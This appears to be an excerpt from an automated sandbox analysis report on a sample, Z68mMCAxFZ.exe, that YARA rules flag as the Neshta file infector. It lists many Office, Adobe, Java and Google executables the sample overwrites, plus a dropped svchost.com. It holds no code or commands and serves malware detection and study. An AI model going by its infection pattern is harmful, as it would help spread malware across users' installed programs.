                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to behavior
                  Drops PE files with a suspicious file extensionShow sources
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Windows\svchost.comJump to dropped file
                  Drops executable to a common third party application directoryShow sources
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Windows\svchost.comJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Windows\svchost.comJump to dropped file

                  Boot Survival:

                  barindex
                  Yara detected NeshtaShow sources
                  Source: Yara matchFile source: Z68mMCAxFZ.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Z68mMCAxFZ.exe PID: 6284, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
